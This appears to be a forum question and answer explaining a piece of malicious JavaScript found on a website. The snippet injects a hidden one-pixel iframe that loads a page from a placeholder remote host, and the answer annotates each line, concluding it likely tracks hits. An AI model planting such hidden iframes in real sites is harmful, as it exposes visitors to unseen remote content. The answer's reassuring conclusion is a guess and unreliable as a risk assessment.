Malicious JavaScript code -

what malicious javascript code doing?

(function () {     var qk = document.createelement('iframe');      qk.src = 'http://xxx.tld/wp-includes/dtd.php';     qk.style.position = 'absolute';     qk.style.border = '0';     qk.style.height = '1px';     qk.style.width = '1px';     qk.style.left = '1px';     qk.style.top = '1px';      if (!document.getelementbyid('qk')) {         document.write('<div id=\'qk\'></div>');         document.getelementbyid('qk').appendchild(qk);     } })(); 

the website @ http://xxx.tld/wp-includes/dtd.php returns ok.

it is:

(function () {     var qk = document.createelement('iframe');  // creating iframe      qk.src = 'http://xxx.tld/wp-includes/dtd.php';  // pointing @ webpage      /*     making iframe take 1px 1px square     in top left-hand corner of web page injected     */     qk.style.position = 'absolute';     qk.style.border = '0';     qk.style.height = '1px';     qk.style.width = '1px';     qk.style.left = '1px';     qk.style.top = '1px';      /*     adding iframe dom creating <div> id of "qt"     (if div has not been created already)     */         if (!document.getelementbyid('qk')) {         document.write('<div id=\'qk\'></div>');         document.getelementbyid('qk').appendchild(qk);     } })(); 

when iframe injected dom browser make request http://xxx.tld/etc. doing track hits on site.